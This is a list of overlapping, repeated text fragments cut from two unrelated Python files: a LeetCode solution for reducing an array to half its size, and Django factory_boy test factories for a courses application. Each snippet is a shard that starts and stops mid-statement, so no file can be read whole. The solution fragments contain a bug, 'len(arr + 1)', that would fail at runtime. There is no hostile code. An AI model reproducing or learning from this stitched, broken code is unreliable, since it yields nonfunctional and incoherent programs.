"= {}, [], 0, len(arr) for num in arr: if num in num_to_count:",
"= reversed(sorted(counts)) if len(arr) % 2 == 0: cut = len(arr) / 2",
"for num in arr: if num in num_to_count: num_to_count[num] += 1 else: num_to_count[num]",
"len(arr) for num in arr: if num in num_to_count: num_to_count[num] += 1 else:",
"/ 2 for count in counts: min_size += 1 current_length -= count if",
"+= 1 else: num_to_count[num] = 1 for num in num_to_count: counts.append(num_to_count[num]) counts =",
"min_size, current_length = {}, [], 0, len(arr) for num in arr: if num",
"len(arr) % 2 == 0: cut = len(arr) / 2 else: cut =",
"Time Complexity: O(NlogN) Space Complexity: O(N) ''' def min_set_size(arr): num_to_count, counts, min_size, current_length",
"+ 1) / 2 for count in counts: min_size += 1 current_length -=",
"counts = reversed(sorted(counts)) if len(arr) % 2 == 0: cut = len(arr) /",
"for num in num_to_count: counts.append(num_to_count[num]) counts = reversed(sorted(counts)) if len(arr) % 2 ==",
"Space Complexity: O(N) ''' def min_set_size(arr): num_to_count, counts, min_size, current_length = {}, [],",
"len(arr) / 2 else: cut = len(arr + 1) / 2 for count",
"if num in num_to_count: num_to_count[num] += 1 else: num_to_count[num] = 1 for num",
"''' Time Complexity: O(NlogN) Space Complexity: O(N) ''' def min_set_size(arr): num_to_count, counts, min_size,",
"/ 2 else: cut = len(arr + 1) / 2 for count in",
"num_to_count[num] = 1 for num in num_to_count: counts.append(num_to_count[num]) counts = reversed(sorted(counts)) if len(arr)",
"num in num_to_count: counts.append(num_to_count[num]) counts = reversed(sorted(counts)) if len(arr) % 2 == 0:",
"1 for num in num_to_count: counts.append(num_to_count[num]) counts = reversed(sorted(counts)) if len(arr) % 2",
"num_to_count: counts.append(num_to_count[num]) counts = reversed(sorted(counts)) if len(arr) % 2 == 0: cut =",
"# https://leetcode.com/problems/reduce-array-size-to-the-half ''' Time Complexity: O(NlogN) Space Complexity: O(N) ''' def min_set_size(arr): num_to_count,",
"for count in counts: min_size += 1 current_length -= count if current_length <=",
"count in counts: min_size += 1 current_length -= count if current_length <= cut:",
"O(N) ''' def min_set_size(arr): num_to_count, counts, min_size, current_length = {}, [], 0, len(arr)",
"[], 0, len(arr) for num in arr: if num in num_to_count: num_to_count[num] +=",
"1 else: num_to_count[num] = 1 for num in num_to_count: counts.append(num_to_count[num]) counts = reversed(sorted(counts))",
"% 2 == 0: cut = len(arr) / 2 else: cut = len(arr",
"== 0: cut = len(arr) / 2 else: cut = len(arr + 1)",
"num in num_to_count: num_to_count[num] += 1 else: num_to_count[num] = 1 for num in",
"+= 1 current_length -= count if current_length <= cut: return min_size return min_size",
"def min_set_size(arr): num_to_count, counts, min_size, current_length = {}, [], 0, len(arr) for num",
"counts: min_size += 1 current_length -= count if current_length <= cut: return min_size",
"in num_to_count: num_to_count[num] += 1 else: num_to_count[num] = 1 for num in num_to_count:",
"current_length = {}, [], 0, len(arr) for num in arr: if num in",
"num_to_count, counts, min_size, current_length = {}, [], 0, len(arr) for num in arr:",
"= len(arr) / 2 else: cut = len(arr + 1) / 2 for",
"else: cut = len(arr + 1) / 2 for count in counts: min_size",
"<reponame>LeandroTk/Algorithms<filename>coding_interviews/leetcode/medium/reduce_array_size_to_the_half/reduce_array_size_to_the_half.py # https://leetcode.com/problems/reduce-array-size-to-the-half ''' Time Complexity: O(NlogN) Space Complexity: O(N) ''' def min_set_size(arr):",
"Complexity: O(NlogN) Space Complexity: O(N) ''' def min_set_size(arr): num_to_count, counts, min_size, current_length =",
"https://leetcode.com/problems/reduce-array-size-to-the-half ''' Time Complexity: O(NlogN) Space Complexity: O(N) ''' def min_set_size(arr): num_to_count, counts,",
"O(NlogN) Space Complexity: O(N) ''' def min_set_size(arr): num_to_count, counts, min_size, current_length = {},",
"in num_to_count: counts.append(num_to_count[num]) counts = reversed(sorted(counts)) if len(arr) % 2 == 0: cut",
"in arr: if num in num_to_count: num_to_count[num] += 1 else: num_to_count[num] = 1",
"len(arr + 1) / 2 for count in counts: min_size += 1 current_length",
"2 for count in counts: min_size += 1 current_length -= count if current_length",
"counts, min_size, current_length = {}, [], 0, len(arr) for num in arr: if",
"0, len(arr) for num in arr: if num in num_to_count: num_to_count[num] += 1",
"2 else: cut = len(arr + 1) / 2 for count in counts:",
"num in arr: if num in num_to_count: num_to_count[num] += 1 else: num_to_count[num] =",
"min_size += 1 current_length -= count if current_length <= cut: return min_size return",
"num_to_count[num] += 1 else: num_to_count[num] = 1 for num in num_to_count: counts.append(num_to_count[num]) counts",
"cut = len(arr + 1) / 2 for count in counts: min_size +=",
"''' def min_set_size(arr): num_to_count, counts, min_size, current_length = {}, [], 0, len(arr) for",
"0: cut = len(arr) / 2 else: cut = len(arr + 1) /",
"2 == 0: cut = len(arr) / 2 else: cut = len(arr +",
"in counts: min_size += 1 current_length -= count if current_length <= cut: return",
"arr: if num in num_to_count: num_to_count[num] += 1 else: num_to_count[num] = 1 for"
"for teacher in extracted: self.teachers.add(teacher) else: random_teachers = random.choices(users_models.Teacher.objects.all(), k=5) for teacher in",
"= factory.SubFactory(users_factories.StudentFactory) profile = fuzzy.FuzzyChoice(PROFILE_CHOICES) @factory.post_generation def students(self, create, extracted, **kwargs): if not",
"end_date=datetime.date.today() + datetime.timedelta(days=100), ) class CourseGroupFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseGroup course =",
"factory.SubFactory(CourseFactory) title = fuzzy.FuzzyText(length=16) description = factory.Faker('text') date = fuzzy.FuzzyDate( start_date=datetime.date.today() - datetime.timedelta(days=100),",
"= factory.Faker('text') head_teacher = factory.SubFactory(users_factories.TeacherFactory) grade = factory.SubFactory(GradeFactory) code_meu = '123' has_exam =",
"import models as users_models PROFILE_CHOICES = [x[0] for x in PROFILE_CHOICES] LANGUAGE_CHOICES =",
"fuzzy.FuzzyDate(datetime.date.today()) class AssignmentFactory(factory.django.DjangoModelFactory): class Meta: model = models.Assignment laboratory = factory.SubFactory(LabFactory) teacher =",
"class Meta: model = models.Assignment laboratory = factory.SubFactory(LabFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) deadline =",
"factory.Faker('text') course = factory.SubFactory(CourseFactory) student = factory.SubFactory(users_factories.StudentFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) class FinalCourseMarkFactory(factory.django.DjangoModelFactory): class",
"from courses.models import LANGUAGE_CHOICES, PROFILE_CHOICES from tests.users import factories as users_factories from users",
"in random_students: self.students.add(student) class CourseFactory(factory.django.DjangoModelFactory): class Meta: model = models.Course name = factory.Sequence(lambda",
"range(1, 40)]) labs_hours = fuzzy.FuzzyChoice([i for i in range(1, 40)]) @factory.post_generation def teachers(self,",
"as fuzzy from django.core.files.base import ContentFile from courses import models from courses.models import",
"if extracted: for teacher in extracted: self.teachers.add(teacher) else: random_teachers = random.choices(users_models.Teacher.objects.all(), k=5) for",
"name = factory.Sequence(lambda n: \"Course %02d\" % n) description = factory.Faker('text') head_teacher =",
"fuzzy.FuzzyText(length=16) content = factory.Faker('text') class CourseFileFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseFile name =",
"- datetime.timedelta(days=100), end_date=datetime.date.today() + datetime.timedelta(days=100), ) class CourseGroupFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseGroup",
"factory.SubFactory(LabFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) deadline = fuzzy.FuzzyDate(datetime.date.today()) title = fuzzy.FuzzyText(length=16) content = factory.Faker('text')",
"factory.SubFactory(CourseFactory) sender = factory.SubFactory(users_factories.TeacherFactory) title = fuzzy.FuzzyText(length=16) content = factory.Faker('text') created_at = fuzzy.FuzzyDate(datetime.date.today())",
"course = factory.SubFactory(CourseFactory) student = factory.SubFactory(users_factories.StudentFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) class NoticeFactory(factory.django.DjangoModelFactory): class Meta:",
"class NoticeFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseNotice course = factory.SubFactory(CourseFactory) sender = factory.SubFactory(users_factories.TeacherFactory)",
"= '123' has_exam = False semester = fuzzy.FuzzyChoice([i for i in range(1, 8)])",
"if not create: return if extracted: for teacher in extracted: self.teachers.add(teacher) else: random_teachers",
"model = models.CourseGroup name = fuzzy.FuzzyText(length=16) @factory.post_generation def students(self, create, extracted, **kwargs): if",
"= models.CourseNotice course = factory.SubFactory(CourseFactory) sender = factory.SubFactory(users_factories.TeacherFactory) title = fuzzy.FuzzyText(length=16) content =",
"= [x[0] for x in LANGUAGE_CHOICES] class GradeFactory(factory.django.DjangoModelFactory): class Meta: model = models.Grade",
"PROFILE_CHOICES = [x[0] for x in PROFILE_CHOICES] LANGUAGE_CHOICES = [x[0] for x in",
"Meta: model = models.Grade name = factory.Sequence(lambda n: \"Grade %03d\" % n) start_year",
"= factory.Faker('text') date = fuzzy.FuzzyDate( start_date=datetime.date.today() - datetime.timedelta(days=100), end_date=datetime.date.today() + datetime.timedelta(days=100), ) class",
"start_year = factory.Faker('date_object') supervisor = factory.SubFactory(users_factories.StudentFactory) profile = fuzzy.FuzzyChoice(PROFILE_CHOICES) @factory.post_generation def students(self, create,",
"8)]) language = fuzzy.FuzzyChoice(LANGUAGE_CHOICES) lecture_hours = fuzzy.FuzzyChoice([i for i in range(1, 40)]) labs_hours",
"Meta: model = models.CourseMark mark = 65 date = fuzzy.FuzzyDate(datetime.date.today()) description = factory.Faker('text')",
"[x[0] for x in LANGUAGE_CHOICES] class GradeFactory(factory.django.DjangoModelFactory): class Meta: model = models.Grade name",
"= fuzzy.FuzzyText(length=16) content = factory.Faker('text') class CourseFileFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseFile name",
"models.Lecture course = factory.SubFactory(CourseFactory) title = fuzzy.FuzzyText(length=16) description = factory.Faker('text') date = fuzzy.FuzzyDate(",
"class CourseFactory(factory.django.DjangoModelFactory): class Meta: model = models.Course name = factory.Sequence(lambda n: \"Course %02d\"",
"extracted: for student in extracted: self.students.add(student) class LabFactory(factory.django.DjangoModelFactory): class Meta: model = models.Laboratory",
"profile = fuzzy.FuzzyChoice(PROFILE_CHOICES) @factory.post_generation def students(self, create, extracted, **kwargs): if not create: return",
"= factory.Sequence(lambda n: \"Course %02d\" % n) description = factory.Faker('text') head_teacher = factory.SubFactory(users_factories.TeacherFactory)",
"i in range(1, 8)]) language = fuzzy.FuzzyChoice(LANGUAGE_CHOICES) lecture_hours = fuzzy.FuzzyChoice([i for i in",
"if extracted: for student in extracted: self.students.add(student) else: random_students = random.choices(users_models.Student.objects.all(), k=10) for",
"factory.Sequence(lambda n: \"Grade %03d\" % n) start_year = factory.Faker('date_object') supervisor = factory.SubFactory(users_factories.StudentFactory) profile",
"LectureFactory(factory.django.DjangoModelFactory): class Meta: model = models.Lecture course = factory.SubFactory(CourseFactory) title = fuzzy.FuzzyText(length=16) description",
"= False semester = fuzzy.FuzzyChoice([i for i in range(1, 8)]) language = fuzzy.FuzzyChoice(LANGUAGE_CHOICES)",
"student = factory.SubFactory(users_factories.StudentFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) class FinalCourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model = models.FinalCourseMark",
"datetime import random import factory import factory.fuzzy as fuzzy from django.core.files.base import ContentFile",
"= factory.SubFactory(CourseFactory) group = factory.SubFactory(GroupFactory) title = fuzzy.FuzzyText(length=16) description = factory.Faker('text') date =",
"title = fuzzy.FuzzyText(length=16) description = factory.Faker('text') date = fuzzy.FuzzyDate( start_date=datetime.date.today() - datetime.timedelta(days=100), end_date=datetime.date.today()",
"GroupFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseGroup name = fuzzy.FuzzyText(length=16) @factory.post_generation def students(self, create,",
"x in PROFILE_CHOICES] LANGUAGE_CHOICES = [x[0] for x in LANGUAGE_CHOICES] class GradeFactory(factory.django.DjangoModelFactory): class",
"factory.Faker('text') date = fuzzy.FuzzyDate( start_date=datetime.date.today() - datetime.timedelta(days=100), end_date=datetime.date.today() + datetime.timedelta(days=100), ) class CourseGroupFactory(factory.django.DjangoModelFactory):",
"self.teachers.add(teacher) class LectureFactory(factory.django.DjangoModelFactory): class Meta: model = models.Lecture course = factory.SubFactory(CourseFactory) title =",
"{'width': 600, 'height': 600} ), 'example.jpg' ) ) created_at = fuzzy.FuzzyDate(datetime.date.today()) updated_at =",
"= random.choices(users_models.Teacher.objects.all(), k=5) for teacher in random_teachers: self.teachers.add(teacher) class LectureFactory(factory.django.DjangoModelFactory): class Meta: model",
"class Meta: model = models.Lecture course = factory.SubFactory(CourseFactory) title = fuzzy.FuzzyText(length=16) description =",
"datetime.timedelta(days=100), end_date=datetime.date.today() + datetime.timedelta(days=100), ) class GroupFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseGroup name",
"= factory.Faker('text') created_at = fuzzy.FuzzyDate(datetime.date.today()) class AssignmentFactory(factory.django.DjangoModelFactory): class Meta: model = models.Assignment laboratory",
"= factory.SubFactory(CourseFactory) name = fuzzy.FuzzyText(length=16) class CourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseMark mark",
"teacher = factory.SubFactory(users_factories.TeacherFactory) class NoticeFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseNotice course = factory.SubFactory(CourseFactory)",
"models.CourseFile name = fuzzy.FuzzyText(length=16) description = factory.Faker('text') file = factory.LazyAttribute( lambda _: ContentFile(",
"self.students.add(student) class LabFactory(factory.django.DjangoModelFactory): class Meta: model = models.Laboratory course = factory.SubFactory(CourseFactory) group =",
"for teacher in random_teachers: self.teachers.add(teacher) class LectureFactory(factory.django.DjangoModelFactory): class Meta: model = models.Lecture course",
"factory.Faker('date_object') supervisor = factory.SubFactory(users_factories.StudentFactory) profile = fuzzy.FuzzyChoice(PROFILE_CHOICES) @factory.post_generation def students(self, create, extracted, **kwargs):",
"language = fuzzy.FuzzyChoice(LANGUAGE_CHOICES) lecture_hours = fuzzy.FuzzyChoice([i for i in range(1, 40)]) labs_hours =",
"extracted: self.teachers.add(teacher) else: random_teachers = random.choices(users_models.Teacher.objects.all(), k=5) for teacher in random_teachers: self.teachers.add(teacher) class",
"return if extracted: for student in extracted: self.students.add(student) class LabFactory(factory.django.DjangoModelFactory): class Meta: model",
"LabFactory(factory.django.DjangoModelFactory): class Meta: model = models.Laboratory course = factory.SubFactory(CourseFactory) group = factory.SubFactory(GroupFactory) title",
"= models.CourseMark mark = 65 date = fuzzy.FuzzyDate(datetime.date.today()) description = factory.Faker('text') course =",
"Meta: model = models.Assignment laboratory = factory.SubFactory(LabFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) deadline = fuzzy.FuzzyDate(datetime.date.today())",
"teacher = factory.SubFactory(users_factories.TeacherFactory) deadline = fuzzy.FuzzyDate(datetime.date.today()) title = fuzzy.FuzzyText(length=16) content = factory.Faker('text') class",
"% n) start_year = factory.Faker('date_object') supervisor = factory.SubFactory(users_factories.StudentFactory) profile = fuzzy.FuzzyChoice(PROFILE_CHOICES) @factory.post_generation def",
"class Meta: model = models.Laboratory course = factory.SubFactory(CourseFactory) group = factory.SubFactory(GroupFactory) title =",
"extracted: for student in extracted: self.students.add(student) else: random_students = random.choices(users_models.Student.objects.all(), k=10) for student",
"for student in extracted: self.students.add(student) else: random_students = random.choices(users_models.Student.objects.all(), k=10) for student in",
"factory.Faker('text') date = fuzzy.FuzzyDate( start_date=datetime.date.today() - datetime.timedelta(days=100), end_date=datetime.date.today() + datetime.timedelta(days=100), ) class GroupFactory(factory.django.DjangoModelFactory):",
"self.students.add(student) else: random_students = random.choices(users_models.Student.objects.all(), k=10) for student in random_students: self.students.add(student) class CourseFactory(factory.django.DjangoModelFactory):",
"factory.SubFactory(CourseFactory) student = factory.SubFactory(users_factories.StudentFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) class NoticeFactory(factory.django.DjangoModelFactory): class Meta: model =",
"factory.Faker('text') file = factory.LazyAttribute( lambda _: ContentFile( factory.django.ImageField()._make_data( {'width': 600, 'height': 600} ),",
"@factory.post_generation def students(self, create, extracted, **kwargs): if not create: return if extracted: for",
"not create: return if extracted: for teacher in extracted: self.teachers.add(teacher) else: random_teachers =",
"factory.Faker('text') course = factory.SubFactory(CourseFactory) student = factory.SubFactory(users_factories.StudentFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) class NoticeFactory(factory.django.DjangoModelFactory): class",
"content = factory.Faker('text') class CourseFileFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseFile name = fuzzy.FuzzyText(length=16)",
"Meta: model = models.Laboratory course = factory.SubFactory(CourseFactory) group = factory.SubFactory(GroupFactory) title = fuzzy.FuzzyText(length=16)",
"class GradeFactory(factory.django.DjangoModelFactory): class Meta: model = models.Grade name = factory.Sequence(lambda n: \"Grade %03d\"",
"= fuzzy.FuzzyDate( start_date=datetime.date.today() - datetime.timedelta(days=100), end_date=datetime.date.today() + datetime.timedelta(days=100), ) class GroupFactory(factory.django.DjangoModelFactory): class Meta:",
"not create: return if extracted: for student in extracted: self.students.add(student) else: random_students =",
"= fuzzy.FuzzyChoice(PROFILE_CHOICES) @factory.post_generation def students(self, create, extracted, **kwargs): if not create: return if",
"**kwargs): if not create: return if extracted: for student in extracted: self.students.add(student) else:",
"def teachers(self, create, extracted, **kwargs): if not create: return if extracted: for teacher",
"date = fuzzy.FuzzyDate( start_date=datetime.date.today() - datetime.timedelta(days=100), end_date=datetime.date.today() + datetime.timedelta(days=100), ) class CourseGroupFactory(factory.django.DjangoModelFactory): class",
"% n) description = factory.Faker('text') head_teacher = factory.SubFactory(users_factories.TeacherFactory) grade = factory.SubFactory(GradeFactory) code_meu =",
"factory.SubFactory(CourseFactory) student = factory.SubFactory(users_factories.StudentFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) class FinalCourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model =",
"= factory.SubFactory(users_factories.TeacherFactory) class NoticeFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseNotice course = factory.SubFactory(CourseFactory) sender",
"= fuzzy.FuzzyText(length=16) @factory.post_generation def students(self, create, extracted, **kwargs): if not create: return if",
"fuzzy.FuzzyChoice([i for i in range(1, 40)]) labs_hours = fuzzy.FuzzyChoice([i for i in range(1,",
"n: \"Course %02d\" % n) description = factory.Faker('text') head_teacher = factory.SubFactory(users_factories.TeacherFactory) grade =",
"Meta: model = models.CourseNotice course = factory.SubFactory(CourseFactory) sender = factory.SubFactory(users_factories.TeacherFactory) title = fuzzy.FuzzyText(length=16)",
"code_meu = '123' has_exam = False semester = fuzzy.FuzzyChoice([i for i in range(1,",
"= factory.Sequence(lambda n: \"Grade %03d\" % n) start_year = factory.Faker('date_object') supervisor = factory.SubFactory(users_factories.StudentFactory)",
"= fuzzy.FuzzyChoice([i for i in range(1, 40)]) labs_hours = fuzzy.FuzzyChoice([i for i in",
"= [x[0] for x in PROFILE_CHOICES] LANGUAGE_CHOICES = [x[0] for x in LANGUAGE_CHOICES]",
"= factory.SubFactory(users_factories.TeacherFactory) class FinalCourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model = models.FinalCourseMark mark = 5 date",
"class Meta: model = models.Course name = factory.Sequence(lambda n: \"Course %02d\" % n)",
"student in extracted: self.students.add(student) class LabFactory(factory.django.DjangoModelFactory): class Meta: model = models.Laboratory course =",
"model = models.Laboratory course = factory.SubFactory(CourseFactory) group = factory.SubFactory(GroupFactory) title = fuzzy.FuzzyText(length=16) description",
"django.core.files.base import ContentFile from courses import models from courses.models import LANGUAGE_CHOICES, PROFILE_CHOICES from",
"in LANGUAGE_CHOICES] class GradeFactory(factory.django.DjangoModelFactory): class Meta: model = models.Grade name = factory.Sequence(lambda n:",
"class Meta: model = models.Grade name = factory.Sequence(lambda n: \"Grade %03d\" % n)",
"users_factories from users import models as users_models PROFILE_CHOICES = [x[0] for x in",
"factory.Faker('text') created_at = fuzzy.FuzzyDate(datetime.date.today()) class AssignmentFactory(factory.django.DjangoModelFactory): class Meta: model = models.Assignment laboratory =",
"student in extracted: self.students.add(student) else: random_students = random.choices(users_models.Student.objects.all(), k=10) for student in random_students:",
"= factory.SubFactory(LabFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) deadline = fuzzy.FuzzyDate(datetime.date.today()) title = fuzzy.FuzzyText(length=16) content =",
"extracted, **kwargs): if not create: return if extracted: for student in extracted: self.students.add(student)",
"= factory.SubFactory(GroupFactory) title = fuzzy.FuzzyText(length=16) description = factory.Faker('text') date = fuzzy.FuzzyDate( start_date=datetime.date.today() -",
"factory.SubFactory(users_factories.StudentFactory) profile = fuzzy.FuzzyChoice(PROFILE_CHOICES) @factory.post_generation def students(self, create, extracted, **kwargs): if not create:",
"extracted, **kwargs): if not create: return if extracted: for teacher in extracted: self.teachers.add(teacher)",
"class LectureFactory(factory.django.DjangoModelFactory): class Meta: model = models.Lecture course = factory.SubFactory(CourseFactory) title = fuzzy.FuzzyText(length=16)",
"for i in range(1, 40)]) labs_hours = fuzzy.FuzzyChoice([i for i in range(1, 40)])",
"= factory.SubFactory(users_factories.StudentFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) class NoticeFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseNotice course",
"for student in extracted: self.students.add(student) class LabFactory(factory.django.DjangoModelFactory): class Meta: model = models.Laboratory course",
"model = models.Grade name = factory.Sequence(lambda n: \"Grade %03d\" % n) start_year =",
"random import factory import factory.fuzzy as fuzzy from django.core.files.base import ContentFile from courses",
"class Meta: model = models.CourseGroup name = fuzzy.FuzzyText(length=16) @factory.post_generation def students(self, create, extracted,",
"models.Grade name = factory.Sequence(lambda n: \"Grade %03d\" % n) start_year = factory.Faker('date_object') supervisor",
"from courses import models from courses.models import LANGUAGE_CHOICES, PROFILE_CHOICES from tests.users import factories",
"name = fuzzy.FuzzyText(length=16) description = factory.Faker('text') file = factory.LazyAttribute( lambda _: ContentFile( factory.django.ImageField()._make_data(",
"not create: return if extracted: for student in extracted: self.students.add(student) class LabFactory(factory.django.DjangoModelFactory): class",
"models.Assignment laboratory = factory.SubFactory(LabFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) deadline = fuzzy.FuzzyDate(datetime.date.today()) title = fuzzy.FuzzyText(length=16)",
"else: random_teachers = random.choices(users_models.Teacher.objects.all(), k=5) for teacher in random_teachers: self.teachers.add(teacher) class LectureFactory(factory.django.DjangoModelFactory): class",
"end_date=datetime.date.today() + datetime.timedelta(days=100), ) class GroupFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseGroup name =",
"random_students: self.students.add(student) class CourseFactory(factory.django.DjangoModelFactory): class Meta: model = models.Course name = factory.Sequence(lambda n:",
"random_teachers = random.choices(users_models.Teacher.objects.all(), k=5) for teacher in random_teachers: self.teachers.add(teacher) class LectureFactory(factory.django.DjangoModelFactory): class Meta:",
"= fuzzy.FuzzyChoice([i for i in range(1, 40)]) @factory.post_generation def teachers(self, create, extracted, **kwargs):",
"Meta: model = models.CourseFile name = fuzzy.FuzzyText(length=16) description = factory.Faker('text') file = factory.LazyAttribute(",
"lecture_hours = fuzzy.FuzzyChoice([i for i in range(1, 40)]) labs_hours = fuzzy.FuzzyChoice([i for i",
"FinalCourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model = models.FinalCourseMark mark = 5 date = fuzzy.FuzzyDate(datetime.date.today()) description",
"supervisor = factory.SubFactory(users_factories.StudentFactory) profile = fuzzy.FuzzyChoice(PROFILE_CHOICES) @factory.post_generation def students(self, create, extracted, **kwargs): if",
"import models from courses.models import LANGUAGE_CHOICES, PROFILE_CHOICES from tests.users import factories as users_factories",
"users_models PROFILE_CHOICES = [x[0] for x in PROFILE_CHOICES] LANGUAGE_CHOICES = [x[0] for x",
"import factory.fuzzy as fuzzy from django.core.files.base import ContentFile from courses import models from",
"class AssignmentFactory(factory.django.DjangoModelFactory): class Meta: model = models.Assignment laboratory = factory.SubFactory(LabFactory) teacher = factory.SubFactory(users_factories.TeacherFactory)",
"course = factory.SubFactory(CourseFactory) student = factory.SubFactory(users_factories.StudentFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) class FinalCourseMarkFactory(factory.django.DjangoModelFactory): class Meta:",
"factory.SubFactory(GradeFactory) code_meu = '123' has_exam = False semester = fuzzy.FuzzyChoice([i for i in",
"factory.SubFactory(users_factories.TeacherFactory) class NoticeFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseNotice course = factory.SubFactory(CourseFactory) sender =",
"40)]) labs_hours = fuzzy.FuzzyChoice([i for i in range(1, 40)]) @factory.post_generation def teachers(self, create,",
"= factory.SubFactory(users_factories.TeacherFactory) title = fuzzy.FuzzyText(length=16) content = factory.Faker('text') created_at = fuzzy.FuzzyDate(datetime.date.today()) class AssignmentFactory(factory.django.DjangoModelFactory):",
"class Meta: model = models.CourseFile name = fuzzy.FuzzyText(length=16) description = factory.Faker('text') file =",
"- datetime.timedelta(days=100), end_date=datetime.date.today() + datetime.timedelta(days=100), ) class GroupFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseGroup",
"LANGUAGE_CHOICES] class GradeFactory(factory.django.DjangoModelFactory): class Meta: model = models.Grade name = factory.Sequence(lambda n: \"Grade",
"if not create: return if extracted: for student in extracted: self.students.add(student) class LabFactory(factory.django.DjangoModelFactory):",
"AssignmentFactory(factory.django.DjangoModelFactory): class Meta: model = models.Assignment laboratory = factory.SubFactory(LabFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) deadline",
"date = fuzzy.FuzzyDate(datetime.date.today()) description = factory.Faker('text') course = factory.SubFactory(CourseFactory) student = factory.SubFactory(users_factories.StudentFactory) teacher",
"name = fuzzy.FuzzyText(length=16) class CourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseMark mark = 65",
"class Meta: model = models.CourseMark mark = 65 date = fuzzy.FuzzyDate(datetime.date.today()) description =",
"course = factory.SubFactory(CourseFactory) name = fuzzy.FuzzyText(length=16) class CourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseMark",
"factory.django.ImageField()._make_data( {'width': 600, 'height': 600} ), 'example.jpg' ) ) created_at = fuzzy.FuzzyDate(datetime.date.today()) updated_at",
"start_date=datetime.date.today() - datetime.timedelta(days=100), end_date=datetime.date.today() + datetime.timedelta(days=100), ) class CourseGroupFactory(factory.django.DjangoModelFactory): class Meta: model =",
"title = fuzzy.FuzzyText(length=16) content = factory.Faker('text') class CourseFileFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseFile",
"Meta: model = models.CourseGroup name = fuzzy.FuzzyText(length=16) @factory.post_generation def students(self, create, extracted, **kwargs):",
"= models.CourseGroup name = fuzzy.FuzzyText(length=16) @factory.post_generation def students(self, create, extracted, **kwargs): if not",
"40)]) @factory.post_generation def teachers(self, create, extracted, **kwargs): if not create: return if extracted:",
"model = models.Assignment laboratory = factory.SubFactory(LabFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) deadline = fuzzy.FuzzyDate(datetime.date.today()) title",
"\"Grade %03d\" % n) start_year = factory.Faker('date_object') supervisor = factory.SubFactory(users_factories.StudentFactory) profile = fuzzy.FuzzyChoice(PROFILE_CHOICES)",
"fuzzy.FuzzyDate( start_date=datetime.date.today() - datetime.timedelta(days=100), end_date=datetime.date.today() + datetime.timedelta(days=100), ) class CourseGroupFactory(factory.django.DjangoModelFactory): class Meta: model",
"i in range(1, 40)]) @factory.post_generation def teachers(self, create, extracted, **kwargs): if not create:",
"= models.Laboratory course = factory.SubFactory(CourseFactory) group = factory.SubFactory(GroupFactory) title = fuzzy.FuzzyText(length=16) description =",
"file = factory.LazyAttribute( lambda _: ContentFile( factory.django.ImageField()._make_data( {'width': 600, 'height': 600} ), 'example.jpg'",
"65 date = fuzzy.FuzzyDate(datetime.date.today()) description = factory.Faker('text') course = factory.SubFactory(CourseFactory) student = factory.SubFactory(users_factories.StudentFactory)",
"model = models.CourseGroup course = factory.SubFactory(CourseFactory) name = fuzzy.FuzzyText(length=16) class CourseMarkFactory(factory.django.DjangoModelFactory): class Meta:",
"fuzzy.FuzzyDate( start_date=datetime.date.today() - datetime.timedelta(days=100), end_date=datetime.date.today() + datetime.timedelta(days=100), ) class GroupFactory(factory.django.DjangoModelFactory): class Meta: model",
"tests.users import factories as users_factories from users import models as users_models PROFILE_CHOICES =",
"= factory.Faker('date_object') supervisor = factory.SubFactory(users_factories.StudentFactory) profile = fuzzy.FuzzyChoice(PROFILE_CHOICES) @factory.post_generation def students(self, create, extracted,",
"factory.Faker('text') class CourseFileFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseFile name = fuzzy.FuzzyText(length=16) description =",
"factories as users_factories from users import models as users_models PROFILE_CHOICES = [x[0] for",
"students(self, create, extracted, **kwargs): if not create: return if extracted: for student in",
"class Meta: model = models.FinalCourseMark mark = 5 date = fuzzy.FuzzyDate(datetime.date.today()) description =",
"factory.SubFactory(users_factories.TeacherFactory) class FinalCourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model = models.FinalCourseMark mark = 5 date =",
"in extracted: self.students.add(student) class LabFactory(factory.django.DjangoModelFactory): class Meta: model = models.Laboratory course = factory.SubFactory(CourseFactory)",
"PROFILE_CHOICES] LANGUAGE_CHOICES = [x[0] for x in LANGUAGE_CHOICES] class GradeFactory(factory.django.DjangoModelFactory): class Meta: model",
"import ContentFile from courses import models from courses.models import LANGUAGE_CHOICES, PROFILE_CHOICES from tests.users",
"CourseGroupFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseGroup course = factory.SubFactory(CourseFactory) name = fuzzy.FuzzyText(length=16) class",
"in range(1, 40)]) @factory.post_generation def teachers(self, create, extracted, **kwargs): if not create: return",
